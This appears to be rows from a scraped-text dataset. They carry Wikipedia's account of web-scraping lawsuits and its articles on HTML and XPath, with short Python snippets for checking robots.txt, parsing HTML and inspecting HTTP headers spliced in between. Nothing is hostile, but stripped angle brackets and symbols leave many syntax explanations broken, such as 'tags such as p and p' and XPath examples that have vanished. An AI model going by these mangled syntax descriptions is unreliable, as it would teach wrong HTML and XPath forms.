However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
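One lightweight, programmatic way to respect both the administrative measures mentioned above and the terms-of-use concerns raised in these cases is to consult a site's robots.txt before crawling. The sketch below uses only the Python standard library; the user agent string and the example URL are placeholders, not anything prescribed by the sources cited above.

# Minimal sketch: check robots.txt before scraping a page.
# The target URL and the user agent string are placeholders.
from urllib.robotparser import RobotFileParser
from urllib.parse import urljoin, urlparse

def allowed_to_fetch(url, user_agent="MyResearchBot/1.0"):
    """Return True if the site's robots.txt permits fetching this URL."""
    root = "{0.scheme}://{0.netloc}".format(urlparse(url))
    rp = RobotFileParser()
    rp.set_url(urljoin(root, "/robots.txt"))
    try:
        rp.read()                      # fetch and parse robots.txt
    except Exception:
        return False                   # be conservative if robots.txt is unreachable
    return rp.can_fetch(user_agent, url)

print(allowed_to_fetch("https://en.wikipedia.org/wiki/Web_scraping"))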
54 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/HTML | Hypertext Markup Language (HTML) is the standard markup language for documents designed to be displayed in a web browser. It defines the content and structure of web content. It is often assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaScript. Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for its appearance. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes, and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p and p surround and provide information about document text and may include sub-element tags. Browsers do not display the HTML tags but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behavior and content of web pages. The inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), former maintainer of the HTML and current maintainer of the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 2 A form of HTML, known as HTML5, is used to display video and audio, primarily using the canvas element, together with JavaScript. In 1980, physicist Tim Berners-Lee, a contractor at CERN, proposed and prototyped ENQUIRE, a system for CERN researchers to use and share documents. In 1989, Berners-Lee wrote a memo proposing an Internet-based hypertext system. 3 Berners-Lee specified HTML and wrote the browser and server software in late 1990. That year, Berners-Lee and CERN data systems engineer Robert Cailliau collaborated on a joint request for funding, but the project was not formally adopted by CERN. In his personal notes of 1990, Berners-Lee listed "some of the many areas in which hypertext is used"; an encyclopedia is the first entry. 4 The first publicly available description of HTML was a document called "HTML Tags", 5 first mentioned on the Internet by Tim Berners-Lee in late 1991. 6 7 It describes 18 elements comprising the initial, relatively simple design of HTML. Except for the hyperlink tag, these were strongly influenced by SGMLguid, an in-house Standard Generalized Markup Language (SGML) based documentation format at CERN. Eleven of these elements still exist in HTML 4. 8 HTML is a markup language that web browsers use to interpret and compose text, images, and other material into visible or audible web pages. Default characteristics for every item of HTML markup are defined in the browser, and these characteristics can be altered or enhanced by the web page designer's additional use of CSS. Many of the text elements are mentioned in the 1988 ISO technical report TR 9537 Techniques for using SGML, which describes the features of early text formatting languages such as that used by the RUNOFF command developed in the early 1960s for the CTSS (Compatible Time-Sharing System) operating system. 
These formatting commands were derived from the commands used by typesetters to manually format documents. However, the SGML concept of generalized markup is based on elements (nested annotated ranges with attributes) rather than merely print effects, with separate structure and markup. HTML has been progressively moved in this direction with CSS. Berners-Lee considered HTML to be an application of SGML. It was formally defined as such by the Internet Engineering Task Force (IETF) with the mid 1993 publication of the first proposal for an HTML specification, the "Hypertext Markup Language (HTML) Internet Draft by Berners-Lee and Dan Connolly, which included an SGML Document type definition to define the syntax. 9 10 The draft expired after six months, but was notable for its acknowledgment of the NCSA Mosaic browser's custom tag for embedding in-line images, reflecting the IETF's philosophy of basing standards on successful prototypes. Similarly, Dave Raggett's competing Internet Draft, "HTML (Hypertext Markup Format) , from late 1993, suggested standardizing already-implemented features like tables and fill-out forms. 11 After the HTML and HTML drafts expired in early 1994, the IETF created an HTML Working Group. In 1995, this working group completed "HTML 2.0", the first HTML specification intended to be treated as a standard against which future implementations should be based. 12 Further development under the auspices of the IETF was stalled by competing interests. Since 1996, update the HTML specifications have been maintained, with input from commercial software vendors, by the World Wide Web Consortium (W3C). 13 In 2000, HTML became an international standard (ISO IEC 15445:2000). HTML 4.01 was published in late 1999, with further errata published through 2001. In 2004, development began on HTML5 in the Web Hypertext Application Technology Working Group (WHATWG), which became a joint deliverable with the W3C in 2008, and was completed and standardized on 28 October 2014. 14 XHTML is a separate language that began as a reformulation of HTML 4.01 using XML 1.0. It is now referred to as the XML syntax for HTML and is no longer being developed as a separate standard. 58 On 28 May 2019, the W3C announced that WHATWG would be the sole publisher of the HTML and DOM standards. 65 66 67 68 The W3C and WHATWG had been publishing competing standards since 2012. While the W3C standard was identical to the WHATWG in 2007 the standards have since progressively diverged due to different design decisions. 69 The WHATWG "Living Standard" had been the de facto web standard for some time. 70 HTML markup consists of several key components, including those called tags (and their attributes), character-based data types, character references and entity references. HTML tags most commonly come in pairs like h1 and h1 , although some represent empty elements and so are unpaired, for example img . The first tag in such a pair is the start tag, and the second is the end tag (they are also called opening tags and closing tags). Another important component is the HTML document type declaration, which triggers standards mode rendering. The following is an example of the classic "Hello, World program: The text between html and html describes the web page, and the text between body and body is the visible page content. The markup text title This is a title title defines the browser page title shown on browser tabs and window titles and the tag div defines a division of the page used for easy styling. 
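The "Hello, World" markup referred to above did not survive into the scraped text, so the following is a minimal reconstruction under the assumption of a plain HTML5 page; it also shows how the page title and visible body content described in the passage can be read back with BeautifulSoup. The exact markup is an illustration, not the original specification example.

# A minimal reconstruction of the "Hello, World" page described above,
# parsed with BeautifulSoup to show the title / body split the text mentions.
from bs4 import BeautifulSoup

hello_html = """<!DOCTYPE html>
<html>
  <head>
    <title>This is a title</title>
  </head>
  <body>
    <div>Hello world!</div>
  </body>
</html>"""

soup = BeautifulSoup(hello_html, "html.parser")
print(soup.title.string)         # browser page title: "This is a title"
print(soup.body.div.get_text())  # visible page content: "Hello world!"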
Between head and head , a meta element can be used to define webpage metadata. The Document Type Declaration DOCTYPE html is for HTML5. If a declaration is not included, various browsers will revert to "quirks mode" for rendering. 71 HTML documents imply a structure of nested HTML elements. These are indicated in the document by HTML tags, enclosed in angle brackets thus: p . 72 better source needed In the simple, general case, the extent of an element is indicated by a pair of tags: a "start tag" p and "end tag" p . The text content of the element, if any, is placed between these tags. Tags may also enclose further tag markup between the start and end, including a mixture of tags and text. This indicates further (nested) elements, as children of the parent element. The start tag may also include the element's attributes within the tag. These indicate other information, such as identifiers for sections within the document, identifiers used to bind style information to the presentation of the document, and for some tags such as the img used to embed images, the reference to the image resource in the format like this: img src "example.com example.jpg" Some elements, such as the line break br do not permit any embedded content, either text or further tags. These require only a single empty tag (akin to a start tag) and do not use an end tag. Many tags, particularly the closing end tag for the very commonly used paragraph element p , are optional. An HTML browser or other agent can infer the closure for the end of an element from the context and the structural rules defined by the HTML standard. These rules are complex and not widely understood by most HTML authors. The general form of an HTML element is therefore: tag attribute1 "value1" attribute2 "value2" 'content' tag . Some HTML elements are defined as empty elements and take the form tag attribute1 "value1" attribute2 "value2" . Empty elements may enclose no content, for instance, the br tag or the inline img tag. The name of an HTML element is the name used in the tags. The end tag's name is preceded by a slash character, , and that in empty elements the end tag is neither required nor allowed. If attributes are not mentioned, default values are used in each case. Header of the HTML document: head ... head . The title is included in the head, for example: HTML headings are defined with the h1 to h6 tags with H1 being the highest (or most important) level and H6 the least: The effects are: CSS can substantially change the rendering. Paragraphs: br . The difference between br and p is that br breaks a line without altering the semantic structure of the page, whereas p sections the page into paragraphs. The element br is an empty element in that, although it may have attributes, it can take no content and it may not have an end tag. This is a link in HTML. To create a link the a tag is used. The href attribute holds the URL address of the link. There are many possible ways a user can give input s like: Comments: Comments can help in the understanding of the markup and do not display in the webpage. There are several types of markup elements used in HTML: Most of the attributes of an element are name value pairs, separated by and written within the start tag of an element after the element's name. The value may be enclosed in single or double quotes, although values consisting of certain characters can be left unquoted in HTML (but not XHTML). 74 75 Leaving attribute values unquoted is considered unsafe. 
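To make the description of start tags, end tags, attributes, and empty elements above concrete, here is a small invented fragment inspected with BeautifulSoup; none of the markup comes from the pages cited in this row.

# Illustrative only: inspecting element names, attributes, and an empty element.
from bs4 import BeautifulSoup

fragment = """
<h1>Heading</h1>
<p id="intro">First paragraph with a <a href="https://example.com/help.php">link</a>.</p>
<p>Second paragraph.<br>With a line break (an empty element).</p>
<img src="example.jpg" alt="placeholder">
"""

soup = BeautifulSoup(fragment, "html.parser")

link = soup.find("a")
print(link.name, link["href"])             # element name and its href attribute

for p in soup.find_all("p"):               # attributes are exposed as a dict
    print(p.attrs, p.get_text(" ", strip=True))

print(soup.find("img").attrs)              # empty element: attributes but no content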
76 In contrast with name-value pair attributes, there are some attributes that affect the element simply by their presence in the start tag of the element, 6 like the ismap attribute for the img element. 77 There are several common attributes that may appear in many elements : The abbreviation element, abbr, can be used to demonstrate some of these attributes: This example displays as HTML; in most browsers, pointing the cursor at the abbreviation should display the title text "Hypertext Markup Language. Most elements take the language-related attribute dir to specify text direction, such as with "rtl" for right-to-left text in, for example, Arabic, Persian or Hebrew. 78 As of version 4.0, HTML defines a set of 252 character entity references and a set of 1,114,050 numeric character references, both of which allow individual characters to be written via simple markup, rather than literally. A literal character and its markup counterpart are considered equivalent and are rendered identically. The ability to "escape" characters in this way allows for the characters and (when written as lt; and amp;, respectively) to be interpreted as character data, rather than markup. For example, a literal normally indicates the start of a tag, and normally indicates the start of a character entity reference or numeric character reference; writing it as amp; or x26; or 38; allows to be included in the content of an element or in the value of an attribute. The double-quote character ( ), when not used to quote an attribute value, must also be escaped as quot; or x22; or 34; when it appears within the attribute value itself. Equivalently, the single-quote character ( ), when not used to quote an attribute value, must also be escaped as x27; or 39; (or as apos; in HTML5 or XHTML documents 79 80 ) when it appears within the attribute value itself. If document authors overlook the need to escape such characters, some browsers can be very forgiving and try to use context to guess their intent. The result is still invalid markup, which makes the document less accessible to other browsers and to other user agents that may try to parse the document for search and indexing purposes for example. Escaping also allows for characters that are not easily typed, or that are not available in the document's character encoding, to be represented within the element and attribute content. For example, the acute-accented e ( ), a character typically found only on Western European and South American keyboards, can be written in any HTML document as the entity reference eacute; or as the numeric references xE9; or 233;, using characters that are available on all keyboards and are supported in all character encodings. Unicode character encodings such as UTF 8 are compatible with all modern browsers and allow direct access to almost all the characters of the world's writing systems. 81 HTML defines several data types for element content, such as script data and stylesheet data, and a plethora of types for attribute values, including IDs, names, URIs, numbers, units of length, languages, media descriptors, colors, character encodings, dates and times, and so on. All of these data types are specializations of character data. HTML documents are required to start with a Document type declaration (informally, a "doctype"). In browsers, the doctype helps to define the rendering mode—particularly whether to use quirks mode. 
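Before the passage turns to doctypes below, note that the character-reference and escaping rules it describes map directly onto Python's standard html module; the strings used here are examples, not text from the cited sources.

# Demonstrating the character-reference escaping discussed above
# with the standard library's html module (example strings only).
import html

raw = 'Prices < $100 & "free" shipping on caf\u00e9 orders'

escaped = html.escape(raw, quote=True)   # & -> &amp;, < -> &lt;, " -> &quot;
print(escaped)

# Named and numeric references are both resolved by unescape():
print(html.unescape("caf&eacute; &#233; &#xE9; &amp; &lt;tag&gt;"))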
The original purpose of the doctype was to enable the parsing and validation of HTML documents by SGML tools based on the Document type definition (DTD). The DTD to which the DOCTYPE refers contains a machine-readable grammar specifying the permitted and prohibited content for a document conforming to such a DTD. Browsers, on the other hand, do not implement HTML as an application of SGML and as consequence do not read the DTD. HTML5 does not define a DTD; therefore, in HTML5 the doctype declaration is simpler and shorter: 82 An example of an HTML 4 doctype This declaration references the DTD for the "strict" version of HTML 4.01. SGML-based validators read the DTD in order to properly parse the document and to perform validation. In modern browsers, a valid doctype activates standards mode as opposed to quirks mode. In addition, HTML 4.01 provides Transitional and Frameset DTDs, as explained below. The transitional type is the most inclusive, incorporating current tags as well as older or "deprecated" tags, with the Strict DTD excluding deprecated tags. The frameset has all tags necessary to make frames on a page along with the tags included in transitional type. 83 Semantic HTML is a way of writing HTML that emphasizes the meaning of the encoded information over its presentation (look). HTML has included semantic markup from its inception, 84 but has also included presentational markup, such as font , i and center tags. There are also the semantically neutral div and span tags. Since the late 1990s, when Cascading Style Sheets were beginning to work in most browsers, web authors have been encouraged to avoid the use of presentational HTML markup with a view to the separation of content and presentation. 85 In a 2001 discussion of the Semantic Web, Tim Berners-Lee and others gave examples of ways in which intelligent software "agents" may one day automatically crawl the web and find, filter, and correlate previously unrelated, published facts for the benefit of human users. 86 Such agents are not commonplace even now, but some of the ideas of Web 2.0, mashups and price comparison websites may be coming close. The main difference between these web application hybrids and Berners-Lee's semantic agents lies in the fact that the current aggregation and hybridization of information is usually designed by web developers, who already know the web locations and the API semantics of the specific data they wish to mash, compare and combine. An important type of web agent that does crawl and read web pages automatically, without prior knowledge of what it might find, is the web crawler or search-engine spider. These software agents are dependent on the semantic clarity of web pages they find as they use various techniques and algorithms to read and index millions of web pages a day and provide web users with search facilities without which the World Wide Web's usefulness would be greatly reduced. In order for search engine spiders to be able to rate the significance of pieces of text they find in HTML documents, and also for those creating mashups and other hybrids as well as for more automated agents as they are developed, the semantic structures that exist in HTML need to be widely and uniformly applied to bring out the meaning of the published text. 87 Presentational markup tags are deprecated in current HTML and XHTML recommendations. 
The majority of presentational features from previous versions of HTML are no longer allowed as they lead to poorer accessibility, higher cost of site maintenance, and larger document sizes. 88 Good semantic HTML also improves the accessibility of web documents (see also Web Content Accessibility Guidelines). For example, when a screen reader or audio browser can correctly ascertain the structure of a document, it will not waste the visually impaired user's time by reading out repeated or irrelevant information when it has been marked up correctly. HTML documents can be delivered by the same means as any other computer file. However, they are most often delivered either by HTTP from a web server or by email. The World Wide Web is composed primarily of HTML documents transmitted from web servers to web browsers using the Hypertext Transfer Protocol (HTTP). However, HTTP is used to serve images, sound, and other content, in addition to HTML. To allow the web browser to know how to handle each document it receives, other information is transmitted along with the document. This meta data usually includes the MIME type (e.g., text html or application xhtml xml) and the character encoding (see Character encodings in HTML). In modern browsers, the MIME type that is sent with the HTML document may affect how the document is initially interpreted. A document sent with the XHTML MIME type is expected to be well-formed XML; syntax errors may cause the browser to fail to render it. The same document sent with the HTML MIME type might be displayed successfully since some browsers are more lenient with HTML. The W3C recommendations state that XHTML 1.0 documents that follow guidelines set forth in the recommendation's Appendix C may be labeled with either MIME Type. 89 XHTML 1.1 also states that XHTML 1.1 documents should 90 be labeled with either MIME type. 91 Most graphical email clients allow the use of a subset of HTML (often ill-defined) to provide formatting and semantic markup not available with plain text. This may include typographic information like colored headings, emphasized and quoted text, inline images and diagrams. Many such clients include both a GUI editor for composing HTML e-mail messages and a rendering engine for displaying them. Use of HTML in e-mail is criticized by some because of compatibility issues, because it can help disguise phishing attacks, because of accessibility issues for blind or visually impaired people, because it can confuse spam filters and because the message size is larger than plain text. The most common filename extension for files containing HTML is .html. A common abbreviation of this is .htm, which originated because some early operating systems and file systems, such as DOS and the limitations imposed by FAT data structure, limited file extensions to three letters. 92 An HTML Application (HTA; file extension .hta) is a Microsoft Windows application that uses HTML and Dynamic HTML in a browser to provide the application's graphical interface. A regular HTML file is confined to the security model of the web browser's security, communicating only to web servers and manipulating only web page objects and site cookies. An HTA runs as a fully trusted application and therefore has more privileges, like creation editing removal of files and Windows Registry entries. Because they operate outside the browser's security model, HTAs cannot be executed via HTTP, but must be downloaded (just like an EXE file) and executed from local file system. 
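The HTTP delivery and MIME-type details discussed in this passage can be checked directly with requests; the URL below is just an example and any page could be substituted.

# Sketch: inspecting how an HTML document is delivered over HTTP.
import requests

resp = requests.get("https://en.wikipedia.org/wiki/HTML", timeout=10)

print(resp.status_code)
print(resp.headers.get("Content-Type"))  # e.g. "text/html; charset=UTF-8"
print(resp.encoding)                     # encoding declared by the server
print(resp.apparent_encoding)            # encoding guessed from the body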
Since its inception, HTML and its associated protocols gained acceptance relatively quickly. However, no clear standards existed in the early years of the language. Though its creators originally conceived of HTML as a semantic language devoid of presentation details, 93 practical uses pushed many presentational elements and attributes into the language, driven largely by the various browser vendors. The latest standards surrounding HTML reflect efforts to overcome the sometimes chaotic development of the language 94 and to create a rational foundation for building both meaningful and well-presented documents. To return HTML to its role as a semantic language, the W3C has developed style languages such as CSS and XSL to shoulder the burden of presentation. In conjunction, the HTML specification has slowly reined in the presentational elements. There are two axes differentiating various variations of HTML as currently specified: SGML-based HTML versus XML-based HTML (referred to as XHTML) on one axis, and strict versus transitional (loose) versus frameset on the other axis. One difference in the latest when? HTML specifications lies in the distinction between the SGML-based specification and the XML-based specification. The XML-based specification is usually called XHTML to distinguish it clearly from the more traditional definition. However, the root element name continues to be "html" even in the XHTML-specified HTML. The W3C intended XHTML 1.0 to be identical to HTML 4.01 except where limitations of XML over the more complex SGML require workarounds. Because XHTML and HTML are closely related, they are sometimes documented in parallel. In such circumstances, some authors conflate the two names as (X)HTML or X(HTML). Like HTML 4.01, XHTML 1.0 has three sub-specifications: strict, transitional, and frameset. Aside from the different opening declarations for a document, the differences between an HTML 4.01 and XHTML 1.0 document—in each of the corresponding DTDs—are largely syntactic. The underlying syntax of HTML allows many shortcuts that XHTML does not, such as elements with optional opening or closing tags, and even empty elements which must not have an end tag. By contrast, XHTML requires all elements to have an opening tag and a closing tag. XHTML, however, also introduces a new shortcut: an XHTML tag may be opened and closed within the same tag, by including a slash before the end of the tag like this: br . The introduction of this shorthand, which is not used in the SGML declaration for HTML 4.01, may confuse earlier software unfamiliar with this new convention. A fix for this is to include a space before closing the tag, as such: br . 95 To understand the subtle differences between HTML and XHTML, consider the transformation of a valid and well-formed XHTML 1.0 document that adheres to Appendix C (see below) into a valid HTML 4.01 document. Making this translation requires the following steps: Those are the main changes necessary to translate a document from XHTML 1.0 to HTML 4.01. To translate from HTML to XHTML would also require the addition of any omitted opening or closing tags. Whether coding in HTML or XHTML it may just be best to always include the optional tags within an HTML document rather than remembering which tags can be omitted. A well-formed XHTML document adheres to all the syntax requirements of XML. A valid document adheres to the content specification for XHTML, which describes the document structure. 
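The difference between HTML's optional tags and XHTML's well-formedness requirement described above can be demonstrated by handing the same slightly malformed fragment to a forgiving HTML parser and to a strict XML parser; the fragment is invented for illustration.

# Illustration of the HTML vs XHTML well-formedness difference described above.
import xml.etree.ElementTree as ET
from bs4 import BeautifulSoup

# An unclosed <br> and a missing </p> are legal in HTML but not well-formed XML.
sloppy = "<html><body><p>First line<br>Second line</body></html>"

# Lenient HTML parsing: the parser recovers the text without complaint.
soup = BeautifulSoup(sloppy, "html.parser")
print(soup.get_text())

# Strict XML (XHTML-style) parsing rejects the same input.
try:
    ET.fromstring(sloppy)
except ET.ParseError as exc:
    print("Not well-formed XML:", exc)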
The W3C recommends several conventions to ensure an easy migration between HTML and XHTML (see HTML Compatibility Guidelines). The following steps can be applied to XHTML 1.0 documents only: By carefully following the W3C's compatibility guidelines, a user agent should be able to interpret the document equally as HTML or XHTML. For documents that are XHTML 1.0 and have been made compatible in this way, the W3C permits them to be served either as HTML (with a text html MIME type), or as XHTML (with an application xhtml xml or application xml MIME type). When delivered as XHTML, browsers should use an XML parser, which adheres strictly to the XML specifications for parsing the document's contents. HTML 4 defined three different versions of the language: Strict, Transitional (once called Loose), and Frameset. The Strict version is intended for new documents and is considered best practice, while the Transitional and Frameset versions were developed to make it easier to transition documents that conformed to older HTML specifications or did not conform to any specification to a version of HTML 4. The Transitional and Frameset versions allow for presentational markup, which is omitted in the Strict version. Instead, cascading style sheets are encouraged to improve the presentation of HTML documents. Because XHTML 1 only defines an XML syntax for the language defined by HTML 4, the same differences apply to XHTML 1 as well. The Transitional version allows the following parts of the vocabulary, which are not included in the Strict version: The Frameset version includes everything in the Transitional version, as well as the frameset element (used instead of body) and the frame element. In addition to the above transitional differences, the frameset specifications (whether XHTML 1.0 or HTML 4.01) specify a different content model, with frameset replacing body, that contains either frame elements, or optionally noframes with a body. As this list demonstrates, the loose versions of the specification are maintained for legacy support. However, contrary to popular misconceptions, the move to XHTML does not imply a removal of this legacy support. Rather the X in XML stands for extensible and the W3C is modularizing the entire specification and opens it up to independent extensions. The primary achievement in the move from XHTML 1.0 to XHTML 1.1 is the modularization of the entire specification. The strict version of HTML is deployed in XHTML 1.1 through a set of modular extensions to the base XHTML 1.1 specification. Likewise, someone looking for the loose (transitional) or frameset specifications will find similar extended XHTML 1.1 support (much of it is contained in the legacy or frame modules). Modularization also allows for separate features to develop on their own timetable. So for example, XHTML 1.1 will allow quicker migration to emerging XML standards such as MathML (a presentational and semantic math language based on XML) and XForms—a new highly advanced web-form technology to replace the existing HTML forms. In summary, the HTML 4 specification primarily reined in all the various HTML implementations into a single clearly written specification based on SGML. XHTML 1.0, ported this specification, as is, to the new XML-defined specification. Next, XHTML 1.1 takes advantage of the extensible nature of XML and modularizes the whole specification. XHTML 2.0 was intended to be the first step in adding new features to the specification in a standards-body-based approach. 
The HTML Living Standard, which is developed by WHATWG, is the official version, while W3C HTML5 is no longer separate from WHATWG. There are some WYSIWYG editors (what you see is what you get), in which the user lays out everything as it is to appear in the HTML document using a graphical user interface (GUI), often similar to word processors. The editor renders the document rather than showing the code, so authors do not require extensive knowledge of HTML. The WYSIWYG editing model has been criticized, 96 97 primarily because of the low quality of the generated code; there are voices advocating a change to the WYSIWYM model (what you see is what you mean). WYSIWYG editors remain a controversial topic because of their perceived flaws such as: |
55 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/XPath | XPath (XML Path Language) is an expression language designed to support the query or transformation of XML documents. It was defined by the World Wide Web Consortium (W3C) in 1999, 1 and can be used to compute values (e.g., strings, numbers, or Boolean values) from the content of an XML document. Support for XPath exists in applications that support XML, such as web browsers, and many programming languages. The XPath language is based on a tree representation of the XML document, and provides the ability to navigate around the tree, selecting nodes by a variety of criteria. 2 3 In popular use (though not in the official specification), an XPath expression is often referred to simply as "an XPath". Originally motivated by a desire to provide a common syntax and behavior model between XPointer and XSLT, subsets of the XPath query language are used in other W3C specifications such as XML Schema, XForms and the Internationalization Tag Set (ITS). XPath has been adopted by a number of XML processing libraries and tools, many of which also offer CSS Selectors, another W3C standard, as a simpler alternative to XPath. There are several versions of XPath in use. XPath 1.0 was published in 1999, XPath 2.0 in 2007 (with a second edition in 2010), XPath 3.0 in 2014, and XPath 3.1 in 2017. However, XPath 1.0 is still the version that is most widely available. 1 The most important kind of expression in XPath is a location path. A location path consists of a sequence of location steps. Each location step has three components: An XPath expression is evaluated with respect to a context node. An Axis Specifier such as 'child' or 'descendant' specifies the direction to navigate from the context node. The node test and the predicate are used to filter the nodes specified by the axis specifier: For example, the node test 'A' requires that all nodes navigated to must have label 'A'. A predicate can be used to specify that the selected nodes have certain properties, which are specified by XPath expressions themselves. The XPath syntax comes in two flavors: the abbreviated syntax, is more compact and allows XPaths to be written and read easily using intuitive and, in many cases, familiar characters and constructs. The full syntax is more verbose, but allows for more options to be specified, and is more descriptive if read carefully. The compact notation allows many defaults and abbreviations for common cases. Given source XML containing at least the simplest XPath takes a form such as that selects C elements that are children of B elements that are children of the A element that forms the outermost element of the XML document. The XPath syntax is designed to mimic URI (Uniform Resource Identifier) and Unix-style file path syntax. More complex expressions can be constructed by specifying an axis other than the default 'child' axis, a node test other than a simple name, or predicates, which can be written in square brackets after any step. For example, the expression selects the first child ( 1 ), whatever its name, of every B element that itself is a child or other, deeper descendant ( ) of an A element that is a child of the current context node (the expression does not begin with a ). The predicate 1 binds more tightly than the operator. To select the first node selected by the expression A B , write (A B ) 1 . 
Note also, index values in XPath predicates (technically, 'proximity positions' of XPath node sets) start from 1, not 0 as common in languages like C and Java. In the full, unabbreviated syntax, the two examples above would be written Here, in each step of the XPath, the axis (e.g. child or descendant-or-self) is explicitly specified, followed by :: and then the node test, such as A or node() in the examples above. Here the same, but shorter: A B position() 1 Axis specifiers indicate navigation direction within the tree representation of the XML document. The axes available are: b As an example of using the attribute axis in abbreviated syntax, a href selects the attribute called href in a elements anywhere in the document tree. The expression . (an abbreviation for self::node()) is most commonly used within a predicate to refer to the currently selected node. For example, h3 . 'See also' selects an element called h3 in the current context, whose text content is See also. Node tests may consist of specific node names or more general expressions. In the case of an XML document in which the namespace prefix gs has been defined, gs:enquiry will find all the enquiry elements in that namespace, and gs: will find all elements, regardless of local name, in that namespace. Other node test formats are: Predicates, written as expressions in square brackets, can be used to filter a node-set according to some condition. For example, a returns a node-set (all the a elements which are children of the context node), and a href 'help.php' keeps only those elements having an href attribute with the value help.php. There is no limit to the number of predicates in a step, and they need not be confined to the last step in an XPath. They can also be nested to any depth. Paths specified in predicates begin at the context of the current step 